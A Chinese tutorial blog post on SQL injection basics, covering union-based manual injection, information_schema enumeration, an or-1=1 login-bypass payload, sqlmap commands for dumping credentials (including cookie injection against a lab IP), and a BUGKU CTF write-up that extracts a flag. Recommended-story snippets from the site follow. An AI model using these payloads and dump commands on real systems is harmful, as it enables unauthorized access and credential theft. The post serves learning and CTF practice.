SQL注入基础

MySQL

通过AppServ/wamp/xampp可以在windows系统中快速搭建出一个Apache+PHP+MySQL的集成Web环境。

基本操作:

select version(); //查看当前MySQL版本

select user(); //查看当前用户

show databases; //查看MySQL中包含了那些数据库

select databases(); //查看当前打开的数据库

use test; //打开test数据库

show tables; //显示数据库中有哪些表

create table hack // //创建表

id int, //创建字段

username varchar(20), //

password varchar(20) //

);

insert into hack value(1,'admin','456');//向hack表中添加数据

insert into hack value(2,'boss','123');

再创建一个news表

create table news

-> (

-> id int,

-> title varchar(50)

-> );

Query OK, 0 rows affected (0.53 sec)

mysql> insert into news values(1,'web');

Query OK, 1 row affected (0.06 sec)

mysql> select * from news;

+------+-------+

| id | title |

+------+-------+

| 1 | web |

+------+-------+

1 row in set (0.00 sec)

ACCESS手工注入

select * from hack; #显示hack表中所有记录

select * from hack where id=1;#从hack表中查找满足条件id=1的记录

select username,password from hack where id=1;#从hack表中查找满足条件id=1的记录,并只显示username和password字

段内容

select * from hack where id=1 and username="admin";#从hack表中查找满足条件id=1以及username="admin"的记录

select * from hack where id=1 or username="boss";#从hack表中查找满足条件id=1或者username="boss"的记录

sql注入中用于猜解表名

select * from news where id=1 and exists(select * from hack); #通过exists()函数判断hack表是否存在

select * from news where id=1 and exists(select username from hack); #通过exists()函数判断hack表是否存在username字段

select * from hack order by 3; #3表示按照第三个字段来排序

union select 联合查询

union联合查询中所有查询的列数必须相同

select * from news union select * from hack; #字段数不匹配,查询出错

select * from news union select username,password from hack; #查询正常

select * from hack union select 1,id,title from news; #查询正常

ACCESS工具注入有 啊D 明小子

利用元数据库information_schema

5.0以后的MySQL中存在一个元数据库information_schema,其中存储着用户在MySQL中创建的所有其他数据库的信息

schemata :存放着所有数据库的名字

tables:存放着所有数据中的数据表的名字

columns:存放着所有数据中的数据表的所有字段的名字、

select table_name from information_schema.tables where table_schema="test"; # 查看test数据库中包含哪些表

select column_name from information_schema.columns where table_name="hack"; #查看hack数据表中包含了哪些字段

table_schema 存放所有数据库的名字

table_name 存放所有表的名字

MySQL手工注入

判断可显字段

union select 1,2,3,4,5,6,7,8,9

mysql中执行联合查询时,后面的查询语句不必指定数据表名这点有别于ACCESS

也可以:

url and 1=2 union select 1,2,3,4,5

爆出当前用户名和数据库名

and 1=2 union select 1,user(),databases(),4,5

爆出xx数据库中的包含的数据表

and 1=2 union select 1,table_name,3,4,5 from information_schema.tables where table_schema="xx"

通过group_concat()函数可以显示字段中的所有内容

and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema="xx"

爆出xx数据表中包含了哪些字段

select column_name from information_schema.columns where table_name="xx"

爆出用户名和密码

union select 1,username,password,4,5 from admin

利用unhex(hex())函数进行编码转换,解决网站编码不一致的问题

union select 1,unhex(hex(username)),unhex(hex(password)),4,5 from admin

mysql工具注入有pangolin 、havij

密码绕过漏洞

1' or 1=1 or '1

1' OR 1=1 OR'1 //过滤了or 但没过滤OR

select * from admin where username='$username' and password='$password'

将绕过语句带入

select * from admin where username='1' or 1=1 or '1'and password='$password'

在逻辑表达式中 and的优先级高于or

假or真or真and假 ==真

sqlmap的使用

检测注入点

sqlmap.py -u "url"

猜解数据库

sqlmap.py -u "url" --dbs

检测当前数据库名

sqlmap.py -u "url" --current-db

检测当前用户

sqlmap.py -u "url" --current-user

检测当前用户是否为数据库管理员

sqlmap.py -u "url" --is-dba

猜解表名

sqlmap.py -u "url" -D"要猜解的数据库名"--tables

猜解字段名

sqlmap.py -u "url" -D"要猜解的数据库名"-T"要猜解的表名"--columns

猜解字段内容

sqlmap.py -u "url" -D"要猜解的数据库名"-T"要猜解的表名"-C "要猜解的字段名"--dump

sqlmap将检测的结果保存在C:\User\用户名\.sqlmap\output目录(/root/.sqlmap/output)

cookie手工注入

cookie是什么

cookie用于在客户端本地保存用户访问网站时的一些身份验证信息

cookie与get和post方法一样,都可用于客户端向服务器端传递数据

利用sqlmap进行cookie漏洞检测

sqlmap -u "http://192.168.200.130/nfsj5.0/shownews.asp" --cookie "id=16" --level 2

--level 指定探测等级

sqlmap共有五个等级,默认为1

级别1,探测get和post数据

级别2,探测cookie数据

猜解表

sqlmap -u "http://192.168.200.130/nfsj5.0/shownews.asp" --cookie "id=16" --level 2 --tables

猜解字段

sqlmap -u "http://192.168.200.130/nfsj5.0/shownews.asp" --cookie "id=16" --level 2 --columns -T "admin"

猜解字段内容

sqlmap -u "http://192.168.200.130/nfsj5.0/shownews.asp" --cookie "id=16" --level 2 --dump -C"username,password" -

T "admin"

cookie工具注入有pangolin

例题:BUGKU 成绩查询wp

进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4#

发现有四个表且都有回显

于是 就开始爆破吧

通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag

之后通过 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名fl4g,sc

很显然我们需要的数据在fl4g这个表里

接下来我们就要暴字段了

通过id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

得到字段skctf_flag

最后我们就可以开始查询数据了

通过id=-1' union select 1,2,3,skctf_flag from fl4g#

得到BUGKU{Sql_INJECT0N_4813drd8hz4}

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 211,290评论 6 491
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,107评论 2 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 156,872评论 0 347
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,415评论 1 283
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,453评论 6 385
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,784评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,927评论 3 406
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,691评论 0 266
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,137评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,472评论 2 326
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,622评论 1 340
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,289评论 4 329
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,887评论 3 312
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,741评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,977评论 1 265
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,316评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,490评论 2 348

推荐阅读更多精彩内容